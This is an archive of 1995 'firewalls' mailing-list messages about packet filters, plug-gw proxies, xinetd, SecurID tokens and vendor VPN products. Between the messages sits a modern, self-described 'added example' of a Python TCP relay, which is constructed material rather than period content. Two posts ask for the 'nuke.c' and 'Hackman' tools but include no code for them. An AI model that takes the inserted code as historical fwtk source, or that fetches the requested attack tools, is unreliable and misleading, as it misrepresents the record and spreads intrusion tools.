try cheops.anu.edu.au/cephron.anu.edu.au also (same ftp dir. structure).
But try coombs first (in preference).

darren

From firewalls-owner Fri May 5 08:09:47 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA09887 for firewalls-outgoing; Fri, 5 May 1995 07:41:16 -0700
Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id HAA09881 for ; Fri, 5 May 1995 07:41:10 -0700
Message-Id: <199505051441.HAA09881@miles.greatcircle.com>
Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA173574984; Sat, 6 May 1995 00:43:04 +1000
From: Darren Reed
Subject: Re: packet filtering software
To: Maurice.Yergeau@Toro.Com
Date: Sat, 6 May 1995 00:43:04 +1000 (EST)
Cc: firewalls@greatcircle.com
In-Reply-To: from "Maurice.Yergeau@Toro.Com" at May 3, 95 08:11:00 am
X-Mailer: ELM [version 2.4 PL23]
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Length: 712
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

In some mail from Maurice.Yergeau@Toro.Com, they said:
>
> I am looking for some software to do packet filtering that will run on a sunos
> box. I was told that TIS toolkit did this sort of thing but can't find it in
> the documentation. Does anyone know if TIS does packet filtering or of some
> software that does?
>
> any help is greatly appreciated.
>

Checkout coombs.anu.edu.au:/pub/net/kernel/ip_fil2.5.2.tar.gz

It is a loadable-kernel module IP filter, with modifications needed to the
kernel. FULL SOURCE code is included, even replacement bits for the SunOS
4.1.x kernel (code is derived from mixing Net-1 and Net-2/3 BSD). I use it on
a sparc2 running 4.1.3_U1 with no troubles.
cheers, darren From firewalls-owner Fri May 5 09:09:27 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA10890 for firewalls-outgoing; Fri, 5 May 1995 08:47:46 -0700 Received: from zzyzx.com (zzyzx.zzyzx.com [192.215.182.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id IAA10883 for ; Fri, 5 May 1995 08:47:41 -0700 Received: by zzyzx.com (4.1/CERF0.9:SMI-4.1) id AA11419; Fri, 5 May 95 08:45:54 PDT From: rodney@zzyzx.com (Rodney P. Rutherford) Message-Id: <9505051545.AA11419@zzyzx.com> Subject: Re: Life, and xinetd To: chuck@telebase.com (Chuck Murcko) Date: Fri, 5 May 1995 08:45:53 -0700 (PDT) Cc: firewalls@greatcircle.com In-Reply-To: <199505041836.OAA15618@telebase.com> from "Chuck Murcko" at May 4, 95 02:36:46 pm X-Mailer: ELM [version 2.4 PL24] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 1584 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > On another note, I have ported xinetd.2.1.4 to BSDI and Linux. It should > be possible to build it for FreeBSD and NetBSD also. I won't waste time > and bandwidth running the README out to all, as you can find it at > ftp.bsdi.edu and sunsite.unc.edu in those sites' incoming directories > as xinetd.2.1.4-bsdi.1.tar.gz and xinetd.2.1.4-linux.1.tar.gz, respectively. > Suffice it to say that xinetd is a beefed-up inetd with access control, > logging, etc. etc., originally written for SunOS 4.x and Ultrix 4.x by > Panagiotis Tsirigotis. > > Thanks for your patience, Brent. > > chuck > Chuck Murcko Telebase Systems, Inc. Wayne PA chuck@telebase.com > And now, on a lighter note: > I tried to think of some self- and company-promoting advertising to put here, > but I couldn't. > Hi Chuck, A clarification for everyone: ftp.bsdi.edu should be ftp.bsdi.com The bsd file is now located in /contrib/networking/xinetd.2.1.4-bsdi.tar.gz I did not find either file on sunsite.unc.edu? 
I myself have just installed NetBSD on a PC at home. Over the next few weeks (months :->) I hope to have it fully configured along with XFree86 and PPP, at which time I will setup some semblence of a firewall/filters between home and work. When I do, I will test out the Xinetd port. If anyone gets there before I do, please let us know how it goes. Thanks, Rodney -- | Rodney P. Rutherford Zzyzx Workstation Peripherals 619-558-7800 | | Technical Director 5893 Oberlin Drive 800-876-7818 | | rodney@zzyzx.com San Diego, CA. 92121 FAX: 619-558-8283 | From firewalls-owner Fri May 5 10:40:43 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA12633 for firewalls-outgoing; Fri, 5 May 1995 10:12:41 -0700 Received: from gold.chem.hawaii.edu (gold.chem.Hawaii.Edu [128.171.55.9]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id KAA12627 for ; Fri, 5 May 1995 10:12:38 -0700 Received: by gold.chem.hawaii.edu (4.1/gold-MX-1.9) id AA04275; Fri, 5 May 95 07:12:18 HST Date: Fri, 5 May 1995 07:10:31 -1000 (HST) From: NetSurfer Subject: Re: PC site security To: "S. Alexander Jacobson" Cc: Gil Tennant , firewalls@GreatCircle.COM In-Reply-To: Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Thu, 4 May 1995, S. Alexander Jacobson wrote: > NetManage Chameleon packages an FTPd with their Internet client > software. I haven't tried doing this with chameleon but...If you're > employer is running the FTP'd and has private netware drives mounted, > then anyone who hacks through the ftpd gets access to those private > directories. This was fixed in v. 4.5 and their ftp & ftpd's have built in proxy support as an option you can configure from a menu. -NetSurfer #include >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> == = = |James D. Wilson |V.PGP 2.7: 512/E12FCD 1994/03/17 > " " o " |P. O. 
Box 15432 | finger for full PGP key > " " / \ " |Honolulu, HI 96830 |====================================> \" "/ G \" |Serendipitous Solutions| Also NetSurfer@sersol.com > >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> From firewalls-owner Fri May 5 11:29:35 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA13183 for firewalls-outgoing; Fri, 5 May 1995 10:47:18 -0700 Received: from relay1.UU.NET (relay1.UU.NET [192.48.96.5]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA13178 for ; Fri, 5 May 1995 10:47:15 -0700 Received: from rssi by relay1.UU.NET with SMTP id QQyolb29428; Fri, 5 May 1995 13:47:41 -0400 Received: from pail.rssi.com by rssi (4.1/SMI-4.1) id AA01599; Fri, 5 May 95 13:45:26 EDT Received: by pail.rssi.com (5.0/SMI-SVR4) id AA03008; Fri, 5 May 1995 13:46:54 +0500 Date: Fri, 5 May 1995 13:46:54 +0500 From: bvvanor@rssi.rssi.com (Brad VanOrden) Message-Id: <9505051746.AA03008@pail.rssi.com> To: firewalls@greatcircle.com Subject: WANG TIU Content-Length: 577 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk As a follow-up to my previous post about the WANG Trusted Interface Unit (TIU), I have to appologize that I did not make it clear that this device can only be used when authorized by NSA. This is essentially the US intelligence community, its contractors, and related foreign intelligence communities. The POC info again is: A. Ann Horton Wang Laboratories, Inc 7500 Old Georgetown Road Bethesda, MD 20814-6198 U.S.A. Phone: 301-657-5267 or 657-5000 FAX: 301-657-5322 Again, my apologies if I mislead anyone. Have a good week-end! 
Brad Van Orden
Rapid Systems Solutions

From firewalls-owner Fri May 5 11:40:00 1995
From: "S. Alexander Jacobson"
Date: Fri, 5 May 1995 13:59:28
To: NetSurfer
Cc: Gil Tennant, firewalls@GreatCircle.COM
Subject: Re: PC site security

On Fri, 5 May 1995, NetSurfer wrote:

> On Thu, 4 May 1995, S. Alexander Jacobson wrote:
>
> > NetManage Chameleon packages an FTPd with their Internet client
> > software. I haven't tried doing this with Chameleon but... if your
> > employer is running the FTPd and has private NetWare drives mounted,
> > then anyone who hacks through the ftpd gets access to those private
> > directories.
>
> This was fixed in v. 4.5 and their ftp & ftpd have built-in proxy
> support as an option you can configure from a menu.

What do you mean fixed? Suppose I have NetWare mounted from DOS and I run Chameleon in Windows. Does Chameleon ftpd block me from mounting NetWare directories? Even if the firewall restricts ftp access to only a certain set of external IPs, the local sec admin must still remember that the NetWare drive is not safe just because the NetWare server isn't running ftpd.

-Alex-
_____________________________________________________________________________
S. Alexander Jacobson            Internet Virtual Office Inc.
alex@virtual.office.com          Consulting   info@virtual.office.com
http://vo.com/people/alex/       Technology   http://virtual.office.com
1-212-799-2645 voice             Strategy     gopher.virtual.office.com
1-212-799-1075 fax                            telephone: 1-800-TODAY-VO

From firewalls-owner Fri May 5 15:39:33 1995
From: Michael Richardson
Date: Fri, 5 May 1995 18:29:44 -0400
To: mckenney@smiley.mitre.ORG
Cc: firewalls@greatcircle.com
Subject: Re: Firewall-to-Firewall Encryption Products
Organization: Milkyway Networks Corporation

In article you write:

> Milkyway Black Hole
> - Supports modified (proprietary) DES algorithm (DES++).

This is DES with some trivial obscuring code; we haven't modified the code. We would like to support GSSAPI on top of a swIPe-like facility, but since swIPe doesn't define any standard encryption yet, we are waiting for an available commercial GSSAPI (e.g. NT Entrust). I suspect this will be the solution for interoperability.

> configuration is the same at each of the nodes.
> At the present time, a user must go through a challenge/response sequence
> at each firewall. The customer is exploring security technologies that
> could eliminate the need for a challenge/response dialogue at each firewall.

Essentially all virtual private network software winds up doing a small amount of packet filtering/routing to get the packets to the remote network to go through the encryption engine. In Black Hole, if you decide *not* to trust the packets coming from the "encrypted virtual interface", then they don't get routed, and must pass through the normal Black Hole proxies. E.g. a branch office can log in to HQ, but they must authenticate, and their packets get encrypted so no one can hijack the connection. Or, you can just route the packets.

--
:!mcr!:  Michael Richardson        | Milkyway Networks Corporation
NCF: aa714 || xx714                | Makers of the Black Hole firewall
+1 613 566-4574 ... mcr@milkyway.com
Home: mcr@sandelman.ocunix.on.ca. PGP key available.

From firewalls-owner Sat May 6 08:39:08 1995
From: Edward Maillet
Date: Sat, 6 May 1995 11:19:23 -0400 (EDT)
To: firewalls@greatcircle.com
Subject: What if I don't have a proxy for my application?

Hey All,

How do application level firewalls (e.g. BlackHole) handle applications that don't have a proxy program written for them?

For example, suppose my company (me.com) needs to provide an application (datascan) for our R & D dept that allows users to use a database that another company (datascan.com) has on the net. Datascan.com gives us the datascan app that runs on a PC under Windows and connects us to their database. If we (me.com) want to use an application firewall, can we still use the datascan app even if the firewall has no datascan proxy? And to make things more interesting, the internal PC is using RFC 1597 IP addresses.

-----
Ed Maillet
maillet@usmcs.maine.edu

From firewalls-owner Sat May 6 10:39:11 1995
From: Alan Hannan
Date: Sat, 6 May 1995 12:10:20 -0500 (CDT)
To: maillet@doc.usmcs.maine.edu (Edward Maillet)
Cc: firewalls@GreatCircle.COM
Subject: Re: What if I don't have a proxy for my application?
In-Reply-To: <9505061519.AA07745@doc.usmcs.maine.edu> from "Edward Maillet" at May 6, 95 11:19:23 am

> How do application level firewalls (e.g. BlackHole) handle applications
> that don't have a proxy program written for them?
Typically they use something that creates a proxy which acts as though it were a packet filter. However, it's not a packet filter: it receives the incoming packet, checks the originating address, destination address, and port number against a ruleset, then acts accordingly, forwarding the packet or dropping the packet. Actually, the port number is acted on earlier by inetd or something similar, which then spawns the "plug-gw". Correspondingly, the packet that is resent has an originating address of the firewall, as opposed to the originating node.

> For example, if my company (me.com) needs to provide an application
> (datascan) for our R & D dept that allows users to use a database that
> another company (datascan.com) has on the net. Datascan.com gives us the
> datascan app that runs on a PC under Windows and connects us to their
> database. If we (me.com) want to use an application firewall can we still
> use the datascan app even if the firewall has no datascan proxy? And to
> make things more interesting the internal PC is using RFC 1597 IP addresses.

It is definitely possible for you to do this with a proxy fw. There are some potential concerns regarding the kind of transport used by the application. Does it run over tcp or udp? I do not believe that TIS's fwtk allows udp, but I may well be wrong. Would someone be kind enough to validate or correct me?

--
alan@mid.net, Networked Systems Administrator
(402) 472-0241 (voice)   (402) 472-0240 (fax)
MIDnet, the United States' Oldest Regional Internet Service Provider
http://www.mid.net/

From firewalls-owner Sat May 6 10:51:36 1995
From: Howard Berkowitz
Date: Sat, 6 May 1995 13:11:36 -0400 (EDT)
To: phil@netpart.com (Phil Trubey)
Cc: padgett@tccslr.dnet.mmc.COM, firewalls@GreatCircle.COM
Subject: Re: Source Code
In-Reply-To: <199505041530.IAA29745@lykos.netpart.com> from "Phil Trubey" at May 4, 95 08:30:20 am

> Phil writes (I think)...
>
> There are other ways of providing the same functionality - BorderWare has a
> user-controllable (ie. you can turn on and off this feature via the console,
> by default it is off) back door that allows the developers to effectively
> telnet into the firewall (which can be initiated only via a certain IP
> address, and only using strong authentication) over the net and see what's
> wrong with a firewall. Patches can be downloaded from the net (patches
> are cryptographically checksummed, of course) by end users and a console
> menu selection is used to apply them (the patch update code brings the
> machine down to a single user, non-network listening mode, applies the
> patches and reboots).
Your point reminded me of an idea with which I have been playing: managing firewalls using SNMP and a to-be-developed Firewall MIB. Before the flamethrowers go on, let's assume that we are using an acceptably authenticated path for the SNMP flow. Whether this is SNMPv2, link encryption, etc., is irrelevant for the immediate discussion.

What I'd like the list to consider is what the abstract mechanisms are that reside on firewalls (including bastion hosts, screening routers, etc.). These abstractions are what a MIB would describe. We would then have the potential, to some extent, of firewall-vendor-independent management of the firewall. We also may have a standard metanotation for describing at least a core set of firewall functions.

My initial thought would be to model both packet forwarding and proxy mechanisms as extensions of the basic IP routing table MIB. There would also be switch variables for log and alarm mechanisms.

> I realize that trusting a vendor to have good support policies is always
> an act of faith, but BorderWare (and other firewall vendors, I might add)
> have an open user mailing list that users can gripe about bad support to.
>
> >The point is that in a dynamic environment a customer may not be able to wait
> >for the next version and at the same time, the vendor may not have the
> >available resources (equipment and manpower) to be able to recreate it.

A MIB dump -- of the firewall MIB and possibly associated host and router MIBs -- might make a very useful support tool.

Howard

PS: I will be going into the hospital for a week of personal diagnostics on Sunday, and am not sure if I will have email access from there. I won't be ignoring the discussion! I'll definitely return to the discussion when NIH lets me out, or if I can get connectivity. My Powerbook is, at the moment, in its ultimate security mode -- needing to go back in for repair. Complain all you like about software; there's nothing like a beta test on your body! :-)

From firewalls-owner Sat May 6 11:39:08 1995
From: jet@abulafia.genmagic.com (J. Eric Townsend)
Date: Sat, 6 May 95 11:38:38 -0700
To: Alan Hannan
Cc: maillet@doc.usmcs.maine.edu (Edward Maillet), firewalls@GreatCircle.COM
Subject: Re: What if I don't have a proxy for my application?
In-Reply-To: <199505061710.MAA26513@jayhawk.mid.net>

"alan" == Alan Hannan writes:

alan> Typically they use something that creates a proxy which acts
alan> as though it were a packet filter. However, it's not a packet
alan> filter, it receives the incoming packet, checks the originating
alan> address, destination address, and port number against a ruleset,
alan> then acts accordingly, forwarding the packet, or dropping the
alan> packet. Actually, the port number is acted on earlier by inetd

Isn't this just a fancy bridge, then?

--
J.
Eric Townsend
vox #: USA 408.774.4252   work: jet@genmagic.com   play: jet@well.sf.ca.us
AT&T PersonaLink: A5803643645@attpls.net, or get my card from directory information

From firewalls-owner Sat May 6 12:39:13 1995
From: simone@jatoba.ufg.br (Simone Cintra Chagas - Adm. rede)
Date: Thu, 4 May 1995 13:57:30 -0300
To: Firewalls@GreatCircle.com
Subject: Hackman

I'm looking for Hackman. Please, if someone has it, send it to me.

Thanks,
Simone.

From firewalls-owner Sat May 6 13:09:08 1995
From: tom@pserv1.dot.state.az.us (Tom Brink)
Date: Sat, 6 May 95 13:02:34 MST
To: alan%mid.net@janus.dot.state.az.us
Cc: firewalls%greatcircle.com@janus.dot.state.az.us (Firewalls)
Reply-To: tom@pserv1.dot.state.az.us
Subject: Re: What if I don't have a proxy for my application?
In-Reply-To: <199505061710.MAA26513@jayhawk.mid.net>; from "Alan Hannan" at May 6, 95 12:10 pm
X-Organization: Arizona Department of Transportation

Alan Hannan writes:

> > How do application level firewalls (e.g. BlackHole) handle applications
> > that don't have a proxy program written for them?

[lots deleted]

> Does it run over tcp or udp? I do not believe that TIS's fwtk allows udp, but
> I may well be wrong. Would someone be kind enough to validate or correct me?

Alan,

fwtk's plug-gw 'plugs' tcp only. In the coming months I plan to 'plug' several sql clients to a server outside our firewall (TIS's fwtk).

--
Tom Brink                              tom@dot.state.az.us
Technical Support Specialist           Technical Research Center
Information Services Group             Arizona Department of Transportation

From firewalls-owner Sat May 6 14:39:08 1995
From: "B. Joe Smith"
Date: Sat, 6 May 1995 16:32:00 -0500 (CDT)
To: Sick Puppy
Cc: Mark Barnes, firewalls@GreatCircle.com
Subject: Re: nuke vs firewalls

From a Newbie: What is nuke?

Joe Smith (Really!)

On Tue, 2 May 1995, Sick Puppy wrote:

> Thanks, but nope, taint in there.
> Done got one copy of nuke.c
> but there usually be several versions of these critters hacked to varying
> extents, so that some are more useful than others. Still looking.
>
> Come on you CERT and CIAC and DISA d00dz, where can I find nuke?
>
> Sick Puppy
> the Cat_Eating_Dawg
> Simple country boy,
> who do simple things.

From firewalls-owner Sat May 6 19:39:15 1995
From: cmcurtin@clipper.cb.att.com
Date: Sat, 6 May 1995 22:39:12 -0400
To: Ivan Kaan <94165200@cpccux0.cityu.edu.hk>, firewalls@GreatCircle.COM
Subject: uns ?!!!
In-Reply-To: Ivan Kaan <94165200@cpccux0.cityu.edu.hk> "" (May 5, 6:42pm)

On May 5, 6:42pm, Ivan Kaan wrote:

> uns firewalls

I don't get it. Maybe everyone figures that since "unsuscribe" doesn't work, abbreviating it to "uns" will? Is it really that complicated to read the first message you get from the list that tells you how to unsubscribe?

Sigh.

--
C Matthew Curtin
AT&T Bell Labs - Internet Gateway Group
cmcurtin@clipper.cb.att.com

From firewalls-owner Sat May 6 19:56:43 1995
From: cmcurtin@clipper.cb.att.com
Date: Sat, 6 May 1995 22:32:10 -0400
To: Scott Surguine, firewalls@greatcircle.com
Subject: Re: FTP Across firewall
In-Reply-To: Scott Surguine "FTP Accross firewall" (May 4, 5:43pm)
References: <199505042343.AA24098@teal.csn.org>

On May 4, 5:43pm, Scott Surguine wrote:

> Question: what is a good method that DOES NOT entail having to alter source-
> code????

Well, I'm not sure this is the most elegant solution, but since you seem more interested in just having something that works (as opposed to hacking the code yourself ...):

Try using Netscape (or some other web browser that supports a proxy). Just set your FTP proxy to be your proxy server, and every time you use Netscape to FTP, it'll go through your proxy server. 'Course this is assuming that you've got the proxy server running. This will just allow you to get a bunch of different clients talking to your servers...
--
C Matthew Curtin
AT&T Bell Labs - Internet Gateway Group
cmcurtin@clipper.cb.att.com

From firewalls-owner Sat May 6 23:33:59 1995
From: patrick@oes.amdahl.com (Patrick Horgan)
Date: Sat, 6 May 1995 22:48:56 +0800
To: hcb@clark.net
Cc: firewalls@greatcircle.com
Subject: SNMP and firewalls (was Re: Source Code)

Firewall-1 already uses SNMP for control.

Patrick
_______________________________________________________________________
These opinions are mine, and not Amdahl's (except by coincidence;).
Patrick J. Horgan, Amdahl Corporation            "Have Sword, Will Travel"
patrick@amdahl.com   1250 East Arques Avenue, P.O. Box 3470 M/S 316
Phone: (408)992-2779   FAX: (408)773-0833   Sunnyvale, CA 94088-3470

From firewalls-owner Sat May 6 23:55:25 1995
From: rapoport@dialup.francenet.fr
Date: Wed, 3 May 1995 17:29:37 +0200
To: firewalls@GreatCircle.com
Subject: looking for a firewall running under AIX

Hi,

I am looking for a firewall product running on AIX. What I found is NetSP from IBM, which doesn't look great (few proxy applications, no accounting ...), and Interlock from ANS, which is not distributed in France. Can anyone help me?

P.S.: The other products I found are Firewall 1 and Gauntlet, but they are not running on AIX. Are there other leading products?
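The plug proxy that Alan Hannan, Eric Townsend and Tom Brink discuss earlier in this digest (a TCP relay that decides on source address and port before relaying anything, originates the onward connection from the firewall, and is TCP-only), worked through as an added example. This is not fwtk's plug-gw: the class, the loopback echo server and the 10.x / 192.0.2.x addresses are constructed for illustration.

```python
"""plug-gw-style TCP relay (added example, not fwtk code).

Policy: decide on the client's source address before any byte is relayed,
open the outbound connection from the gateway itself (so the far end sees
the gateway as the origin), and relay TCP streams only: a UDP datagram has
no connection for inetd to hand over, which is why a plug of this shape is
TCP-only, as Tom Brink notes.
"""
import ipaddress
import socket
import threading

DROP, FORWARD = "drop", "forward"


class PlugGateway:
    """One plug: clients from permit_nets that reach listen_port are connected
    to (dst_host, dst_port); everyone else is dropped at accept time."""

    def __init__(self, listen_port, dst_host, dst_port, permit_nets, deny_nets=()):
        self.listen_port = listen_port
        self.dst = (dst_host, dst_port)
        self.permit = [ipaddress.ip_network(n) for n in permit_nets]
        self.deny = [ipaddress.ip_network(n) for n in deny_nets]

    def decide(self, client_ip: str) -> str:
        """Deny entries win over permit entries; an unmatched source is dropped."""
        addr = ipaddress.ip_address(client_ip)
        if any(addr in net for net in self.deny):
            return DROP
        return FORWARD if any(addr in net for net in self.permit) else DROP

    @staticmethod
    def _pump(src: socket.socket, dst: socket.socket) -> None:
        """Copy one direction of the stream until EOF, then half-close the other side."""
        try:
            while chunk := src.recv(4096):
                dst.sendall(chunk)
        except OSError:
            pass
        finally:
            try:
                dst.shutdown(socket.SHUT_WR)
            except OSError:
                pass

    def handle(self, client: socket.socket, peer) -> str:
        """Serve one accepted connection (the socket inetd would hand to plug-gw)."""
        verdict = self.decide(peer[0])
        if verdict != FORWARD:
            client.close()                 # dropped: the destination is never contacted
            return verdict
        upstream = socket.create_connection(self.dst)   # originates from the gateway
        back = threading.Thread(target=self._pump, args=(upstream, client), daemon=True)
        back.start()
        self._pump(client, upstream)
        back.join()
        upstream.close()
        client.close()
        return verdict


def _echo_server(listener: socket.socket) -> None:
    """Constructed stand-in for the outside service (datascan.com in the thread)."""
    conn, _ = listener.accept()
    listener.close()
    with conn:
        while chunk := conn.recv(4096):
            conn.sendall(chunk)


def plug_roundtrip(payload: bytes, permit_nets=("127.0.0.0/8",), deny_nets=()) -> bytes:
    """Run the echo server and a plug on loopback, send payload through the plug
    and return what comes back; b"" means the plug dropped the connection."""
    echo = socket.socket()
    echo.bind(("127.0.0.1", 0))
    echo.listen(1)
    threading.Thread(target=_echo_server, args=(echo,), daemon=True).start()

    front = socket.socket()
    front.bind(("127.0.0.1", 0))
    front.listen(1)
    gw = PlugGateway(front.getsockname()[1], "127.0.0.1", echo.getsockname()[1],
                     permit_nets, deny_nets)

    def serve_one():
        client, peer = front.accept()
        front.close()
        gw.handle(client, peer)

    threading.Thread(target=serve_one, daemon=True).start()
    try:
        with socket.create_connection(("127.0.0.1", gw.listen_port), timeout=5) as c:
            c.sendall(payload)
            c.shutdown(socket.SHUT_WR)
            chunks = []
            while chunk := c.recv(4096):
                chunks.append(chunk)
        return b"".join(chunks)
    except OSError:
        return b""      # reset by the plug: nothing was relayed
```

The ruleset only ever sees the client's address and the port the plug listens on; what the datascan protocol carries inside the stream is invisible to it, which is the trade-off against a real application proxy.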
From firewalls-owner Sun May 7 00:00:20 1995
From: bwern@jax.jaxnet.com (Ben Wern)
Date: Tue, 2 May 1995 17:05:41 -0400
To: Firewalls@GreatCircle.COM
Subject: Help with beginning options?

Hello. This may not specifically be in the charter, but I'm asking anyway. I'm trying to learn as much as possible about firewalls, etc., for my upcoming pitch for an internet connection for my company. If you guys/gals have a free second, I'd love it if you could look at what I am proposing, poke holes in it, and tell me where to go for more information. If not, just delete, but I'd appreciate it if you have the time.

My current design consists of a router to connect to the 56k or ISDN link. The router dumps into an unsecured subnet that consists of whatever sacrificial lamb machines I have serving the outside world, and the Firewall. The firewall connects to our internal network. The firewall should allow any outgoing traffic, but restrict incoming traffic to ONLY SMTP to one machine inside the net. All other servers (FTP, WWW, etc.) are in the unprotected network.

My question lies in the Firewall server. I've been looking into Janus (or BorderWare, or whatever they're calling it now), but that seems to force us into using their application servers, and might limit us as far as options go. I've also been looking into Gauntlet, from TIS, and just using the FWTK kit. Unfortunately, I'm not expecting much money for this, so I expect I'll be forced to scrimp. :(

Anyone care to offer thoughts, etc. for a new firewalls person?

Thanks,
Ben Wern
bwern@jaxnet.com   | PGP Key available by Finger!
bwern@pathtech.com | PGP Mail gets priority!
bwern@unf6.edu     | Ask for it by name!
"I used to get disgusted, but now I just get amused"

From firewalls-owner Sun May 7 00:09:34 1995
From: vin@shore.net (Vin McLellan)
Date: Sat, 6 May 1995 01:41:41 -0500
To: Firewalls@greatcircle.com
Cc: Steve.Waltner@wichitaks.hmpd.com, joep@ia.mc.xerox.com, woods@ncar.ucar.edu
Subject: SecurID (was Re: Secure Modem Pool)

When Steve Waltner asked:

> What about a product from Security Dynamics and is called SecureID?
> This setup sounds like a fairly secure setup to me, but I wanted other
> opinions from readers of this mailing list.

Joe Pennell responded:

>> I had a chance to use the SecureID card at a former employer, and was very
>> impressed.
In addition to the features mentioned, I must add that admin >>of these things is great, especially if you have remote users. >>The one complaint that I might have is the way the PIN number works. The >>first >>time you use the card, you type the serial number into the server. You then >>give a PIN number, and the server maintains this info. But, all future >>connections are made on PIN number only, so the PIN number must be unique. If >>you only have a few remote users, this might be OK. As the number grows, it >>becomes a bit of a pain. Not to mention that if somebody tries a PIN and it >>doesn't work, they know that someone on the system already has it.... Actually, the PIN need not be unique. It is combined in series with the constantly changing card-code -- visible in the LCD display on the card -- to make up the momentarily-unique "passcode" that is a one-time password. (With the SecurID Pinpad cards, the PIN is typed _into_ the card and mathematically combined with the card-code.) According to the SDI manual, there should be no a need to type in the serial number. With a brand new card, you type in just the card-code, and then the server (a) either issues you a new PIN, or (b) prompts you create a PIN, with 4-8 digits or characters. SDI recommends a minimum 6-character PIN. (They also urge and recommend that their server be allowed to create and issue the PINs.) A new PIN should be rejected only when it doesn't fit the required PIN attributes, as originally specified by the Administrator. (Those attributes will also be on-screen when a user is choosing a PIN.) Greg Woods took issue with Mr. Pennell: >>>I thought admin of these things was a royal pain >>>in the butt. For one thing, the ONLY way to set the PIN number requires >>>running the "sdshell" program, which requires that the user have a login >>>shell account on a secured system. 
If you only want the users to access >>>your systems through a proxy login server using the SecurID card >>>to authenticate, it makes setting the PIN a real pain. The PIN, as noted above, can also be issued by SDI's ACE server. The SDI server also allows an Administrator to implement a "new PIN" mode which has the user type in the LCD card-code... and then, both the user and the server accept the next card-code as the user's PIN henceforth. (This makes even setting the PIN a single-transaction function, which meets the constraints imposed by some routers, comm servers, and modems.) For the first few years SDI sold the SecurIDs, the design required users to have their PINs issued by the ACE server. It was only around '89 that SDI allowed users to select their own PINs -- and that was to allow MVS users to "choose" their RAC-F password (a hack that effectively integrated SecurID and RAC-F.) >>>Plus I found the menu-driven administration program very annoying; >>>absolutely no way to automate any of the routine tasks. I sympathize with you. Token/password management is a pain, and the trend is to expand functionality to allow Administrators more control options for handling the needs of larger, enterprise-wide, networks. I know that when SDI chieftain Chuck Stuckie toured Wall Street a month ago (just before SDI went public and promptly doubled its share-price) he told analysts that SDI was wrapping up development on a GUI interface and a new, more powerful, ACE card-management database. That should ease and speed up administrative tasks. >>>It is also quite easy for a user to disable their own card by making too >>>many >>>consecutive mistakes logging in. I understand that the reason for this is >>>to >>>prevent random guessing of the password, but the administrator has almost no >>>control over this. The ACE server protects itself against brute-force attacks by disabling an account where ten consecutive invalid passcodes have been entered. 
When the server can parse a passcode -- and can identify a valid PIN,
followed by an invalid card-code -- the server demands the user type in the
next LCD card-code (on the assumption that the card may be out of
time-synch.) At set-up, the Administrator selects the number of times the
user will be allowed to enter a valid-PIN/invalid card-code combination
(1 to 5, default at 3) before the ACE system blocks the account.

The SecurID controls are tightest where the users are allowed the most
latitude to weaken the system. ACE disables an account when it is fed three
invalid PINs followed by valid card-codes. In this case, the paranoid system
suspects it is dealing with a stolen card -- and, because of fear that the
user chose a small or predictable PIN, the gate slams shut more quickly than
in the face of other threats.

>>>Another problem is that Security Dynamics works on the TRUST US model (see
>>>previous recent flame war) in that their algorithm for generating passwords
>>>is proprietary and we have no way of knowing how secure it REALLY is.

Your problem, I think, is that the algorithm is secret, not that it is
proprietary. I remember arguing with Ken Weiss, the SecurID inventor, about
this before SDI had a product. Weiss agreed that the secrecy of the
algorithm should in no way be a factor in the real security of the product.
(Indeed, any security analysis, a la Kerckhoffs, has to presume that an
attacker has been able to obtain the algorithm.) Weiss' argument then was
that his target markets -- then, particularly, banks and financial service
firms -- were more comfortable with a secret algorithm. It is one additional
protective barrier, but the secrecy of the algorithm serves a commercial --
not a cryptographic -- function. I also recall there was some fear of a
knock-off card out of China, or some other patent-scorning state.
Then as now, there were a number of public algorithms which, like SecurID,
could process the precise time, and a secret card-specific "seed," to offer
an equivalent passcode (secure in the sense of being unpredictable to
someone who didn't have the secret seed for that card.) Weiss just didn't
want to deal with some international entity claiming that their card was
wholly identical to the SecurID.

To address the trust issue, SDI took several approaches. First, SDI allows
virtually any responsible party access to the algorithm and the necessary
tools to examine and test it, under a non-disclosure agreement. Select
customers (upon signing over a few first-born sons) even get the source
code. (I presume it was this type of independent examination which preceded
the adoption of the ACE/SecurID package by crypto-savvy elements of the
defense and nuclear energy establishments in most Western nations.)

SDI took another approach that intrigued me. In cryptographic theory, there
is no way to _prove_ such an algorithm "secure." The only way to justify a
claim of security (unpredictability of output) is to subject the algorithm
to an on-going series of attacks, classic and new. Over many years, SDI has
commissioned a series of American and European cryptographers to study,
test, and beat on the SecurID algorithm -- thus far, with no breach. Reports
on the array of tests and attacks, and the results (over the signatures of
notable luminaries in cryptanalysis,) are, I presume, available from SDI
for prospective customers.

I have the SDI client/server manual on my desk, so I may sound informed --
but please direct technical queries or general requests for information to:
SDI@shore.net. I don't speak for Security Dynamics. SDI has been an
occasional client of my firm for many years, however, and I think the
SecurID is an elegant piece of tech. I also wish I bought the stock;-(

Sure,
Vin

--
Vin McLellan    +The Privacy Guild+    USA Tel.
(617) 884-5546    Mail: 53 Nichols St., Chelsea, Ma. 02150

From firewalls-owner Sun May 7 00:16:01 1995
Date: Fri, 05 May 1995 18:49 +0100 (MET)
